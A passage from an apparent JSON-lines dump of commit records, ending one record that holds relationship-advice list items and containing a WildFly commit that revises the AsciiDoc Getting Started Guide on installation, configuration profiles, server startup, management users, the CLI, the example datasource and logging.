Whether or not it leads to sex, physical affection is important.\n58. Don\u2019t forget to say \u201cI Like You.\u201d\nThe greatest compliment you can give a partner (especially a long-term partner) is reminding them that not only do you love them, but also like them.\n59. Have a spontaneous midday tryst. \nSend him a text as he\u2019s about to go on his lunch break, take time out on a Saturday, however you want to play it.\nPhoto: Imaxtree\nPhoto: Imaxtree\n60. Travel together.\nSeeing the world together creates amazing shared memories.\n61. Tell them EXACTLY why you love and appreciate them as often as possible. \n\u201cI love you\u201d is good. \u201cI love the way you make sure no one ever feels left out\u201d is even better.\n62. Stay out of their family drama. \nIt\u2019s so not worth it.\n63. Really look at each other. \nWe spend a lot of time with our partners but sometimes we don\u2019t actually see them. Take the time to actually look into one another\u2019s eyes.\n64. Give each other a pet name. \nIt may be super annoying to other people (and you may want to reserve it for when you\u2019re in private), but a pet name can add an extra layer of intimacy to your relationship.\n65. Spend time alone.\nAs important as it is to spend quality time with your partner, it\u2019s equally necessary that you develop a good sense of who you are without them. Kahlil Gibran said \u201clet there be spaces in your togetherness,\u201d and we stand by that.\n66. Eat at the dinner table. \nDo you eat in front of the TV? Try actually sitting down to a meal with your partner at an actual table. You may find it a welcome change.\n67. In fact, turn the TV off all together. \nWhy not try instituting a TV-free night in your apartment? See what else happens when you spend time together sans the talking box.\n68. Ask for clarity. \nIf you\u2019re confused about what your partner means, ask for clarity instead of making assumptions about what they mean. Use an open phrase like, \u201cWhat did you mean when you said, \u2018xyz'\u201d rather than instantly going on the offensive.\n69. Own your feelings. \nPassive-aggressiveness is a total relationship killer. Quash it by practicing assertiveness and clarity. Saying \u201cI\u2019m fine\u201d when you\u2019re not fine is a prime example of not owning your feelings.\n70. Communicate in a constructive way.\nFor instance, we think the phrase construction \u201cWhen ____ happens, it makes me feel ____\u201d can be particularly helpful.\n71. Take an interest in what your partner\u2019s into.\nHe\u2019s into chess, or cheese, or cheese that looks like a chess board (maybe?). You don\u2019t have to love it, but give it a shot. You may surprise yourself!\n72. But also cultivate your own. \nYou and your partner don\u2019t need to have everything in common. Seriously. That\u2019s actually really annoying.\n73. Let your partner teach you something they\u2019re good at, and vice versa.\nEveryone\u2014everyone\u2014loves the feeling of being able to teach somebody they like about something they\u2019re good at.\n74. Bring your groups together.\nIt\u2019s easy to silo your social lives and create separate his-and-hers worlds, but bringing your friends, siblings, or colleagues together can be a fun thing.\n75. Don\u2019t forget about sex.\nWork, stress, and other responsibilities can get in the way of your sex life, and before you know it, you\u2019ve gone a month without getting busy. Don\u2019t let this happen. 
Schedule it in if you have to, just make sure to connect in an intimate way.\n76. But do forget about jealousy.\nJealousy can be completely toxic to relationships, so keep yours in check. If you\u2019re always jealous, figure out if it\u2019s your personal issue, or if your partner is doing things to appear less trustworthy.\n77. Cultivate your appreciation.\nSpread what you love about your partner. Practice your appreciation by sharing it with others\u2014not in a gross, gratuitous, braggy way, but don\u2019t miss out on the opportunity to tell others why your partner is awesome. In turn, it\u2019ll remind you why you like them, too.\n78. Laugh. In bed. \nSex should be sexy, sure. But it should also be fun. Don\u2019t be afraid to have a laugh if things take a turn for the ridiculous.\n79. Let yourself be taken care of when you need it.\nWe all need special care on occasion. Let your partner help you when you\u2019re feeling sick or down. It doesn\u2019t mean you\u2019re not strong, it just means you\u2019re willing to accept help.\n80. Check your competitive edge.\nYou and your partner are there to support each other, not compete with one another. If you find yourself comparing yourself or competing with your significant other, check your behavior. That\u2019s not healthy!\n81. Have a bed day.\nAllow yourselves a totally lazy day where you lie around and do nothing of note except enjoy each other\u2019s company.\n82. Be kind to yourself.\nThe best way to develop positive patterns in a relationship is to develop them first with yourself. Don\u2019t be so critical of yourself, and you\u2019ll set a good example for your relationship.\n83. Express gratitude for the little things, and for specific things. \nBig gestures are great, but it\u2019s important to recognize the little things your partner does that make you feel happy and loved, too.\nPhoto: Getty Images\n84. Date like you dated in high school.\nAsk each other out. Get excited. Take forever to get ready. Make out. Repeat.\n85. Be present. \nWe can ruin a perfectly great relationship by focusing too much on the past, or worrying too much about what may happen in the future. Learn to enjoy where you are, and who you\u2019re with right now.\n86. Don\u2019t try to control.\nA relationship isn\u2019t a battle of wills, it\u2019s two people who are choosing to be together, so don\u2019t treat your partner like they\u2019re some kind of wild animal you\u2019re trying to tame.\n87. Embrace your common goals.\nWhat is it that you both want to accomplish? Can you support each other to reach those goals? That\u2019ll be a big piece of what will hold you two together as a couple in the long run.\n88. Have a cultural experience together.\nSee a movie, a play, or an art exhibition together \u2014 and then talk about it afterward. You may be pleasantly surprised by how differently\u2014or similarly\u2014you viewed things.\n89. Go on a long bike ride.\nBike rides are deeply freeing experiences, and it\u2019s nice to be able to do that with someone you love.\n90. Try talking on the phone.\nYes, we know this sounds crazy, but phone calls allow a different sort of communication than texting, or even talking in person. You may actually deepen your connection through a phone chat.\n91. Make a mix for each other. \nIt\u2019s cute, romantic and something out of a rom-com. Although in this day and age, you might want to make a Spotify playlist rather than a mix CD.\n92. 
Keep yourself in check.\nWe spend so much time paying attention to how our partners behave, but take a second to notice how you\u2019re acting \u2014 especially if you\u2019re fired up or in a bad mood. And then give yourself a second to\u2026\n93. \u2026 Breathe. \nBefore you say something you don\u2019t mean, take a breath and ask yourself if that\u2019s really the way you want to move forward. Chances are, taking a second out will help you recalibrate and think of a more constructive way of handling the situation.\n94. Help each other.\nThis one is so easy, but if your partner\u2019s having a hard time with something \u2014 whether it\u2019s doing their taxes or organizing their closet \u2014 offer a helping hand.\n95. Be their biggest cheerleader.\nIf your partner\u2019s accomplished something amazing, let them know it, and let them shine.\n96. In your craziest moments of frustration or anger, remember what it is that you like about them the most. \nThere\u2019s a reason you\u2019re with them after all, right?\n97. Remember that a relationship should always make your life better on the whole, not worse.\nAnd aim to make sure yours is doing just that. If it\u2019s not, it may be time to reconsider.\n98. Enjoy the quiet moments you spend with each other. \nNot everything has to be a big adventure or a big deal. Sometimes the best times are the quiet, unplanned things you do together.\n99. Make sure you\u2019re taking care of yourself.\nDon\u2019t let yourself get so invested in your partner that you forget to take care of yourself.\n100. Let go of the past.\nWe often let our past hurts dictate our present. Learn to let go of past resentments and fears in order to live more fully with your partner right now.\n101. Touch each other often.\nSimple touch builds intimacy \u2014 especially non-sexual touch. It\u2019s a non-verbal way of saying, \u201cyes, I\u2019m here for you, and I care about you\u201d and it helps reinforce your emotional bond.\n102. The best relationships are ones in which both partners feel like the luckiest person in the world. 
\nFind ways to communicate that and foster that feeling in each other, and you\u2019ll be good.\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"d5f0bce8b8897fdd09a4a3bf772d963a81165ca6","subject":"[WFLY-14646] Correct the structure of the Getting Started Guide, plus some misc improvements","message":"[WFLY-14646] Correct the structure of the Getting Started Guide, plus some misc improvements\n","repos":"jstourac\/wildfly,pferraro\/wildfly,jstourac\/wildfly,wildfly\/wildfly,rhusar\/wildfly,rhusar\/wildfly,iweiss\/wildfly,iweiss\/wildfly,pferraro\/wildfly,iweiss\/wildfly,wildfly\/wildfly,iweiss\/wildfly,pferraro\/wildfly,pferraro\/wildfly,rhusar\/wildfly,jstourac\/wildfly,rhusar\/wildfly,jstourac\/wildfly,wildfly\/wildfly,wildfly\/wildfly","old_file":"docs\/src\/main\/asciidoc\/Getting_Started_Guide.adoc","new_file":"docs\/src\/main\/asciidoc\/Getting_Started_Guide.adoc","new_contents":"[[Getting_Started_Guide]]\n= Getting Started Guide\nWildFly team;\n:revnumber: {version}\n:revdate: {localdate}\n:toc: macro\n:toclevels: 3\n:toc-title: Getting Started Guide\n:doctype: book\n:icons: font\n:source-highlighter: coderay\nifdef::env-github[:imagesdir: images\/]\n\n\/\/ ifndef::ebook-format[:leveloffset: 1]\n\n(C) 2017 The original authors.\n\nifdef::basebackend-html[toc::[]]\n:numbered:\n\n[[getting-started-with-wildfly]]\n== Getting Started with WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} is the latest release in a series of JBoss open-source\napplication server offerings. WildFly {wildflyVersion} is an exceptionally fast,\nlightweight and powerful implementation of the Jakarta\nPlatform specifications. The state-of-the-art architecture built on the\nModular Service Container enables services on-demand when your\napplication requires them. 
The table below lists the technologies available in WildFly {wildflyVersion}\nserver configuration profiles.\n\n[cols=\",,,,\",options=\"header\"]\n|=======================================================================\n|Jakarta EE Platform Technology |Jakarta EE Full Platform |Jakarta EE Web\nProfile |WildFly {wildflyVersion} Full Platform |WildFly {wildflyVersion} Web Profile\n\n|Jakarta WebSocket |X |X |X |X\n\n|Jakarta JSON Processing 1.1 |X |X |X |X\n\n|Jakarta JSON Binding Specification 1.0 |X |X |X |X\n\n|Jakarta Servlet 4.0 |X |X |X |X\n\n|Jakarta Server Faces 2.3 |X |X |X |X\n\n|Jakarta Expression Language 3.0 |X |X |X |X\n\n|Jakarta Server Pages 2.3 |X |X |X |X\n\n|Jakarta Standard Tag Library 1.2 |X |X |X |X\n\n|Jakarta Batch 1.0 |X |-- |X |--\n\n|Jakarta Concurrency |X |X |X |X\n\n|Jakarta Contexts and Dependency Injection 2.0 |X |X |X |X\n\n|Jakarta Dependency Injection |X |X |X |X\n\n|Jakarta Bean Validation 2.0 |X |X |X |X\n\n|Jakarta Enterprise Beans 3.2 |X (CMP 2.0 optional) |X (Lite) |X (CMP 2.0 not available) |X (Lite)\n\n|Jakarta Interceptors 1.2 |X |X |X |X\n\n|Jakarta Connectors 1.7 |X |-- |X |X\n\n|Jakarta Persistence 2.2 |X |X |X |X\n\n|Jakarta Annotations 1.3 |X |X |X |X\n\n|Jakarta Messaging 2.0 |X |-- |X |--\n\n|Jakarta Transactions 1.3 |X |X |X |X\n\n|Jakarta Mail 1.6 |X |-- |X |X\n\n|Jakarta RESTful Web Services 2.1 |X |X |X |X\n\n|Jakarta Enterprise Web Services 1.3 |X |-- |X |--\n\n|Jakarta XML Web Services Specification 2.3 |X |X |X |X\n\n|Jakarta Web Services Metadata |X |-- |X |--\n\n|Jakarta XML RPC 1.1 |Optional |-- |-- |--\n\n|Jakarta SOAP with Attachments 1.3 |X |-- |X |--\n\n|Jakarta XML Registries |Optional |-- |-- |--\n\n|Jakarta XML Binding Specification 2.3 |X |X |X |X\n\n|Jakarta Authentication 1.1 |X |-- |X |--\n\n|Jakarta Authorization 1.5 |X |-- |X |--\n\n|Jakarta EE Application Deployment 1.2 |Optional |-- |-- |--\n\n|Jakarta Management 1.1 |X |-- |X |--\n\n|Jakarta Debugging Support for Other Languages 1.0 |X |X |X |X\n\n|Jakarta Security 1.0 |X |X |X |X\n|=======================================================================\n\n.Missing ActiveMQ Artemis and Jakarta Messaging?\n[WARNING]\nThe WildFly Web Profile doesn't include Jakarta Messaging (provided by ActiveMQ Artemis) by\ndefault. If you want to use messaging, make sure you start the server\nusing the \"Full Platform\" configuration.\n\nThis document provides a quick overview on how to download and get\nstarted using WildFly {wildflyVersion} for your application development. For in-depth\ncontent on administrative features, refer to the WildFly {wildflyVersion} Admin Guide.\n\n[[requirements]]\n== Requirements\n\n* Java SE 8 or later. We recommend that you use the latest available update\nof the current long-term support Java release.\n\n\n[[installation-options]]\n== Installation Options\n\nThere are a number of ways you can install WildFly, including unzipping our traditional download zip, provisioning a\ncustom installation using Galleon, or building a bootable jar. The link:Installation_Guide{outfilesuffix}[Installation Guide]\nhelps you identify the kind of WildFly installation that best fits your application's deployment needs.\n\n
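As an illustration, a trimmed installation can be provisioned with the Galleon CLI.\nThe following is only a sketch, assuming the Galleon tool is already installed and\nusing a hypothetical target directory and layer selection:\n\n[source,options=\"nowrap\"]\n----\ngalleon.sh install wildfly:current --dir=my-wildfly-server --layers=web-server\n----\n\n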
In this guide\nwe'll focus on the common approach of installing the download zip.\n\n[[download]]\n=== Download\n\nWildFly {wildflyVersion} distributions can be obtained from:\n\nhttp:\/\/www.wildfly.org\/downloads\/[wildfly.org\/downloads]\n\nWildFly {wildflyVersion} provides a single distribution available in zip or tar file\nformats.\n\n* *wildfly-{wildflyVersion}.0.0.Final.zip*\n* *wildfly-{wildflyVersion}.0.0.Final.tar.gz*\n\n[[installation]]\n=== Installation\n\nSimply extract your chosen download to the directory of your choice. You\ncan install WildFly {wildflyVersion} on any operating system that supports the zip or\ntar formats. Refer to the Release Notes for additional information\nrelated to the release.\n\n[[wildfly---a-quick-tour]]\n== WildFly - A Quick Tour\n\nNow that you've downloaded WildFly {wildflyVersion}, the next thing to do is discuss the\nlayout of the distribution and explore the server directory structure,\nkey configuration files, log files, user deployments and so on. It's\nworth familiarizing yourself with the layout so that you'll be able to\nfind your way around when it comes to deploying your own applications.\n\n[[wildfly-directory-structure]]\n=== WildFly Directory Structure\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|appclient |Configuration files, deployment content, and writable areas\nused by the application client container run from this installation.\n\n|bin |Startup scripts, startup configuration files and various command\nline utilities like Vault, add-user and Java diagnostic report, available\nfor Unix and Windows environments\n\n|bin\/client |Contains a client jar for use by non-Maven-based clients.\n\n|docs\/schema |XML schema definition files\n\n|docs\/examples\/configs |Example configuration files representing\nspecific use cases\n\n|domain |Configuration files, deployment content, and writable areas\nused by the domain mode processes run from this installation.\n\n|modules |WildFly is based on a modular classloading architecture.\nThe various modules used in the server are stored here.\n\n|standalone |Configuration files, deployment content, and writable areas\nused by the single standalone server run from this installation.\n\n|welcome-content |Default Welcome Page content\n|=======================================================================\n\n[[standalone-directory-structure]]\n==== Standalone Directory Structure\n\nIn \" *_standalone_* \" mode each WildFly {wildflyVersion} server instance is an\nindependent process (similar to previous JBoss AS versions; e.g., 3, 4,\n5, or 6). The configuration files, deployment content and writable areas\nused by the single standalone server run from a WildFly installation are\nfound in the following subdirectories under the top level \"standalone\"\ndirectory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the standalone server that runs\noff of this installation. 
All configuration information for the running\nserver is located here and is the single place for configuration\nmodifications for the standalone server.\n\n|data |Persistent information written by the server to survive a restart\nof the server\n\n|deployments |End user deployment content can be placed in this\ndirectory for automatic detection and deployment of that content into\nthe server's runtime. NOTE: The server's management API is recommended\nfor installing deployment content. File system based deployment scanning\ncapabilities remain for developer convenience.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |Standalone server log files\n\n|tmp |Location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[domain-directory-structure]]\n==== Domain Directory Structure\n\nA key feature of WildFly {wildflyVersion} is the ability to manage multiple servers from a\nsingle control point. A collection of multiple servers is referred to\nas a \" *_domain_* \". Domains can span multiple physical (or virtual)\nmachines with all WildFly instances on a given host under the control of\na Host Controller process. The Host Controllers interact with the Domain\nController to control the lifecycle of the WildFly instances running on\nthat host and to assist the Domain Controller in managing them. The\nconfiguration files, deployment content and writable areas used by\ndomain mode processes run from a WildFly installation are found in the\nfollowing subdirectories under the top level \"domain\" directory:\n\n[cols=\",\",options=\"header\"]\n|=======================================================================\n|DIRECTORY |DESCRIPTION\n\n|configuration |Configuration files for the domain and for the Host\nController and any servers running off of this installation. All\nconfiguration information for the servers managed within the domain is\nlocated here and is the single place for configuration information.\n\n|content |An internal working area for the Host Controller that controls\nthis installation. This is where it internally stores deployment\ncontent. This directory is not meant to be manipulated by end users. Note\nthat \"domain\" mode does not support deploying content based on scanning\na file system.\n\n|lib\/ext |Location for installed library jars referenced by applications\nusing the Extension-List mechanism\n\n|log |Location where the Host Controller process writes its logs. The\nProcess Controller, a small lightweight process that actually spawns the\nother Host Controller process and any Application Server processes, also\nwrites a log here.\n\n|servers |Writable area used by each Application Server instance that\nruns from this installation. Each Application Server instance will have\nits own subdirectory, created when the server is first started. 
In each\nserver's subdirectory there will be the following subdirectories:\ndata -- information written by the server that needs to survive a restart of the server;\nlog -- the server's log files;\ntmp -- location for temporary files written by the server\n\n|tmp |Location for temporary files written by the server\n\n|tmp\/auth |Special location used to exchange authentication tokens with\nlocal clients so they can confirm that they are local to the running AS\nprocess.\n|=======================================================================\n\n[[wildfly-configurations]]\n=== WildFly {wildflyVersion} Configurations\n\n[[standalone-server-configurations]]\n==== Standalone Server Configurations\n\n* standalone.xml (_default_)\n** Jakarta web profile certified configuration with\nthe required technologies plus those noted in the table above.\n\n* standalone-ha.xml\n** Jakarta web profile certified configuration with\nhigh availability\n\n* standalone-full.xml\n** Jakarta Full Platform certified configuration\nincluding all the required technologies\n\n* standalone-full-ha.xml\n** Jakarta Full Platform certified configuration with\nhigh availability\n\n* standalone-microprofile.xml\n** A configuration oriented toward microservices, providing our\nMicroProfile platform implementations combined with Jakarta RESTful Web Services and\ntechnologies Jakarta RESTful Web Services applications commonly use to integrate with\nexternal services.\n\n* standalone-microprofile-ha.xml\n** A configuration oriented toward microservices, similar to\n_standalone-microprofile.xml_ but with support for high availability\nweb sessions and distributed Hibernate second level caching.\n\n[[domain-server-configurations]]\n==== Domain Server Configurations\n\n* domain.xml\n** Jakarta full and web profiles available with or\nwithout high availability\n\nIt is important to note that the *_domain_* and *_standalone_* modes\ndetermine how the servers are managed, not what capabilities they\nprovide.\n\n[[starting-wildfly-10]]\n== Starting WildFly {wildflyVersion}\n\nTo start WildFly {wildflyVersion} using the default web profile configuration in \"\n_standalone_\" mode, change directory to $JBOSS_HOME\/bin.\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh\n----\n\nTo start the default web profile configuration using domain management\ncapabilities,\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh\n----\n\n[[starting-wildfly-with-an-alternate-configuration]]\n=== Starting WildFly with an Alternate Configuration\n\nIf you choose to start your server with one of the other provided\nconfigurations, they can be accessed by passing the --server-config\nargument with the server-config file to be used.\n\nTo use the Full Platform with clustering capabilities, use the following\nsyntax from $JBOSS_HOME\/bin:\n\n[source,options=\"nowrap\"]\n----\n.\/standalone.sh --server-config=standalone-full-ha.xml\n----\n\nSimilarly, to start an alternate configuration in _domain_ mode:\n\n[source,options=\"nowrap\"]\n----\n.\/domain.sh --domain-config=my-domain-configuration.xml\n----\n\nAlternatively, you can create your own configuration, selecting the\nsubsystems you want to add, remove, or modify.\n\n[[test-your-installation]]\n=== Test Your Installation\n\nAfter executing one of the above commands, you should see output similar\nto what's shown below.\n\n[source,options=\"nowrap\"]\n----\n=========================================================================\n\u00a0\n JBoss Bootstrap Environment\n\u00a0\n JBOSS_HOME: 
\/opt\/wildfly-10.0.0.Final\n\u00a0\n JAVA: java\n\u00a0\n JAVA_OPTS: -server -Xms64m -Xmx512m -XX:MetaspaceSize=96M -XX:MaxMetaspaceSize=256m -Djava.net.preferIPv4Stack=true -Djboss.modules.system.pkgs=com.yourkit,org.jboss.byteman -Djava.awt.headless=true\n\u00a0\n=========================================================================\n\u00a0\n11:46:11,161 INFO [org.jboss.modules] (main) JBoss Modules version 1.5.1.Final\n11:46:11,331 INFO [org.jboss.msc] (main) JBoss MSC version 1.2.6.Final\n11:46:11,391 INFO [org.jboss.as] (MSC service thread 1-6) WFLYSRV0049: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) starting\n<snip>\n11:46:14,300 INFO [org.jboss.as] (Controller Boot Thread) WFLYSRV0025: WildFly Full 10.0.0.Final (WildFly Core 2.0.10.Final) started in 1909ms - Started 267 of 553 services (371 services are lazy, passive or on-demand)\n----\n\nAs with previous WildFly releases, you can point your browser to\n*_http:\/\/localhost:8080_* (if using the default configured http port)\nwhich brings you to the Welcome Screen:\n\nimage:wildfly.png[images\/wildfly.png]\n\nFrom here you can access links to the WildFly community documentation\nset, stay up-to-date on the latest project information, have a\ndiscussion in the user forum and access the enhanced web-based\nAdministration Console. Or, if you uncover a defect while using WildFly,\nreport an issue to inform us (attached patches will be reviewed). This\nlanding page is recommended for convenient access to information about\nWildFly {wildflyVersion} but can easily be replaced with your own if desired.\n\n[[managing-your-wildfly-10]]\n== Managing your WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} offers two administrative mechanisms for managing your\nrunning instance:\n\n* a web-based Administration Console\n* a command-line interface\n\nThe link:Admin_Guide{outfilesuffix}[Admin Guide] covers the details on managing your WildFly\ninstallation. Here we'll just touch on some of the basics.\n\n=== Authentication\n\nBy default WildFly {wildflyVersion} is distributed with security enabled for the\nmanagement interfaces. This means that before you connect using the\nadministration console or remotely using the CLI you will need to add a\nnew user. 
This can be achieved simply by using the _add-user.sh_ script\nin the bin folder.\n\nAfter starting the script you will be guided through the process to add\na new user:\n\n[source,options=\"nowrap\"]\n----\n.\/add-user.sh\nWhat type of user do you wish to add?\n a) Management User (mgmt-users.properties)\n b) Application User (application-users.properties)\n(a):\n----\n\nIn this case a new user is being added for the purpose of managing the\nservers, so select option a.\n\nYou will then be prompted to enter the details of the new user being\nadded:\n\n[source,options=\"nowrap\"]\n----\nEnter the details of the new user to add.\nRealm (ManagementRealm) :\nUsername :\nPassword :\nRe-enter Password :\n----\n\nIt is important to leave the name of the realm as 'ManagementRealm', as\nthis needs to match the name used in the server's configuration. For the\nremaining fields, enter the new username, password and password\nconfirmation.\n\nProvided there are no errors in the values entered, you will then be\nasked to confirm that you want to add the user. The user will be written\nto the properties files used for authentication, and a confirmation\nmessage will be displayed.\n\nThe modified times of the properties files are inspected at the time of\nauthentication and the files reloaded if they have changed. For this\nreason you do not need to restart the server after adding a new user.\n\n[[administration-console]]\n=== Administration Console\n\nTo access the web-based Administration Console, simply follow the link\nfrom the Welcome Screen. To directly access the Management Console,\npoint your browser at:\n\n*_http:\/\/localhost:9990\/console_*\n\nNOTE: Port 9990 is the default configured management port, as shown in the\nfollowing configuration:\n\n[source,xml,options=\"nowrap\"]\n----\n<management-interfaces>\n <native-interface security-realm=\"ManagementRealm\">\n <socket-binding native=\"management-native\"\/>\n <\/native-interface>\n <http-interface security-realm=\"ManagementRealm\">\n <socket-binding http=\"management-http\"\/>\n <\/http-interface>\n<\/management-interfaces>\n----\n\nIf you modify the _management-http_ socket binding in your running\nconfiguration, adjust the above URL accordingly. If such\nmodifications are made, then the link from the Welcome Screen will also\nbe inaccessible.\n\nIf you have not yet added at least one management user, an error page\nwill be displayed asking you to add a new user. After a user has been\nadded, you can click on the 'Try Again' link at the bottom of the error\npage to try connecting to the administration console again.\n\n[[command-line-interface]]\n=== Command-Line Interface\n\nIf you prefer to manage your server from the command line (or batching),\nthe _jboss-cli.sh_ script provides the same capabilities available via\nthe web-based UI. This script is accessed from the $JBOSS_HOME\/bin\ndirectory; e.g.,\n\n[source,options=\"nowrap\"]\n----\n$JBOSS_HOME\/bin\/jboss-cli.sh --connect\nConnected to standalone controller at localhost:9990\n----\n\nNotice that if no host or port information is provided, the CLI will\ndefault to localhost:9990.\n\nWhen running locally to the WildFly process, the CLI will silently\nauthenticate against the server by exchanging tokens on the file system.\nThe purpose of this exchange is to verify that the client does have\naccess to the local file system.\n\n
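To connect to a server on another host, the controller address can be passed\nexplicitly. A minimal sketch, assuming a remote host named `remotehost`\nlistening on the default management port:\n\n[source,options=\"nowrap\"]\n----\n$JBOSS_HOME\/bin\/jboss-cli.sh --connect --controller=remote+http:\/\/remotehost:9990\n----\n\n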
When connecting to a remote WildFly installation in this way, you will be\nprompted to enter the username and password of a user already added to the\nrealm.\n\nOnce connected, you can add, modify, and remove resources, and deploy or\nundeploy applications. For a complete list of commands and command\nsyntax, type *_help_* once connected.\n\n[[modifying-the-example-datasource]]\n=== Modifying the Example DataSource\n\nAs with previous JBoss application server releases, a default data\nsource, *_ExampleDS_*, is configured using the embedded H2 database for\ndeveloper convenience. There are two ways to define datasource\nconfigurations:\n\n1. as a module\n2. as a deployment\n\nIn the provided configurations, H2 is configured as a module. The module\nis located in the $JBOSS_HOME\/modules\/com\/h2database\/h2 directory. The\nH2 datasource configuration is shown below.\n\n[source,xml,options=\"nowrap\"]\n----\n<subsystem xmlns=\"urn:jboss:domain:datasources:1.0\">\n <datasources>\n <datasource jndi-name=\"java:jboss\/datasources\/ExampleDS\" pool-name=\"ExampleDS\">\n <connection-url>jdbc:h2:mem:test;DB_CLOSE_DELAY=-1<\/connection-url>\n <driver>h2<\/driver>\n <pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/pool>\n <security>\n <user-name>sa<\/user-name>\n <password>sa<\/password>\n <\/security>\n <\/datasource>\n <xa-datasource jndi-name=\"java:jboss\/datasources\/ExampleXADS\" pool-name=\"ExampleXADS\">\n <driver>h2<\/driver>\n <xa-datasource-property name=\"URL\">jdbc:h2:mem:test<\/xa-datasource-property>\n <xa-pool>\n <min-pool-size>10<\/min-pool-size>\n <max-pool-size>20<\/max-pool-size>\n <prefill>true<\/prefill>\n <\/xa-pool>\n <security>\n <user-name>sa<\/user-name>\n <password>sa<\/password>\n <\/security>\n <\/xa-datasource>\n <drivers>\n <driver name=\"h2\" module=\"com.h2database.h2\">\n <xa-datasource-class>org.h2.jdbcx.JdbcDataSource<\/xa-datasource-class>\n <\/driver>\n <\/drivers>\n <\/datasources>\n<\/subsystem>\n----\n\nThe datasource subsystem is provided by the\nhttp:\/\/www.jboss.org\/ironjacamar[IronJacamar] project. For a detailed\ndescription of the available configuration properties, please consult\nthe project documentation.\n\n* IronJacamar homepage: http:\/\/www.jboss.org\/ironjacamar\n* Project Documentation: http:\/\/www.jboss.org\/ironjacamar\/docs\n* Schema description:\nhttp:\/\/docs.jboss.org\/ironjacamar\/userguide\/1.0\/en-US\/html\/deployment.html#deployingds_descriptor\n\n[[configure-logging-in-wildfly]]\n=== Configure Logging in WildFly\n\nWildFly logging can be configured with the web console or the command\nline interface. You can get more detail on the link:Admin_Guide{outfilesuffix}#Logging[Logging\nConfiguration] page.\n\nTurn on debugging for a specific category with the CLI:\n\n[source,options=\"nowrap\"]\n----\n\/subsystem=logging\/logger=org.jboss.as:add(level=DEBUG)\n----\n\nIn the example above the `org.jboss.as` log category was configured. Use a different value\nfor the `logger` key to configure a different log category.\n\nBy default the `server.log` is configured to include all levels in its\nlog output. 
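The console handler, on the other hand, defaults to the INFO level, so the\nDEBUG messages enabled above will appear in `server.log` but not in the\nconsole output. A sketch of the additional step, assuming the default\nhandler name `CONSOLE`:\n\n[source,options=\"nowrap\"]\n----\n\/subsystem=logging\/console-handler=CONSOLE:write-attribute(name=level, value=DEBUG)\n----\n\n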
In the above example we changed the console to also display\ndebug messages.\n","old_contents":"[[Getting_Started_Guide]]\n= Getting Started Guide\nWildFly team;\n:revnumber: {version}\n:revdate: {localdate}\n:toc: macro\n:toclevels: 3\n:toc-title: Getting Started Guide\n:doctype: book\n:icons: font\n:source-highlighter: coderay\nifdef::env-github[:imagesdir: images\/]\n\n\/\/ ifndef::ebook-format[:leveloffset: 1]\n\n(C) 2017 The original authors.\n\nifdef::basebackend-html[toc::[]]\n:numbered:\n\n[[getting-started-with-wildfly]]\n== Getting Started with WildFly {wildflyVersion}\n\nWildFly {wildflyVersion} is the latest release in a series of JBoss open-source\napplication server offerings. WildFly {wildflyVersion} is an exceptionally fast,\nlightweight and powerful implementation of the Jakarta\nPlatform specifications. The state-of-the-art architecture built on the\nModular Service Container enables services on-demand when your\napplication requires them. The table below lists the technologies available in WildFly {wildflyVersion}\nserver configuration profiles.\n\n[cols=\",,,,\",options=\"header\"]\n|=======================================================================\n|Jakarta EE Platform Technology |Jakarta EE Full Platform |Jakarta EE Web\nProfile |WildFly {wildflyVersion} Full Platform |WildFly {wildflyVersion} Web Profile\n\n|Jakarta WebSocket |X |X |X |X\n\n|Jakarta JSON Processing 1.1 |X |X |X |X\n\n|Jakarta JSON Binding Specification 1.0 |X |X |X |X\n\n|Jakarta Servlet 4.0 |X |X |X |X\n\n|Jakarta Server Faces 2.3 |X |X |X |X\n\n|Jakarta Expression Language 3.0 |X |X |X |X\n\n|Jakarta Server Pages 2.3 |X |X |X |X\n\n|Jakarta Standard Tag Library 1.2 |X |X |X\n|X\n\n|Jakarta Batch 1.0 |X |-- |X |--\n\n|Jakarta Concurrency |X |X |X |X\n\n|Jakarta Contexts and Dependency Injection 2.0 |X |X |X |X\n\n|Jakarta Dependency Injection |X |X |X |X\n\n|Jakarta Bean Validation 2.0 |X |X |X |X\n\n|Jakarta Enterprise Beans 3.2 |XCMP 2.0Optional |X(Lite) |XCMP\n2.0Not Available |X(Lite)\n\n|Jakarta Interceptors 1.2 |X |X |X |X\n\n|Jakarta Connectors 1.7 |X |-- |X |X\n\n|Jakarta Persistence 2.2 |X |X |X |X\n\n|Jakarta Annotations 1.3 |X |X |X |X\n\n|Jakarta Messaging 2.0 |X |-- |X |--\n\n|Jakarta Transactions 1.3 |X |X |X |X\n\n|Jakarta Mail 1.6 |X |-- |X |X\n\n|Jakarta RESTful Web Services 2.1 |X |X |X |X\n\n|Jakarta Enterprise Web Services 1.3 |X |-- |X |--\n\n|Jakarta XML Web Services Specification 2.3 |X |X |X |X\n\n|Jakarta Web Services Metadata |X |-- |X |--\n\n|Jakarta XML RPC 1.1 |Optional |-- |-- |--\n\n|Jakarta SOAP with Attachments 1.3 |X |-- |X |--\n\n|Jakarta XML Registries |Optional |-- |-- |--\n\n|Jakarta XML Binding Specification 2.3 |X |X |X |X\n\n|Jakarta Authentication 1.1 |X |-- |X |--\n\n|Jakarta Authorization 1.5 |X |-- |X |--\n\n|Jakarta EE Application Deployment 1.2 |Optional |-- |-- |--\n\n|Jakarta Management 1.1 |X |\u00a0 |X |\u00a0\n\n|Jakarta Debugging Support for Other Languages 1.0 |X |X |X |X\n\n|Jakarta Security 1.0 |X |X |X |X\n|=======================================================================\n\nMissing ActiveMQ Artemis and Jakarta Messaging?\n\n[WARNING]\n\nThe WildFly Web Profile doesn't include Jakarta Messaging (provided by ActiveMQ 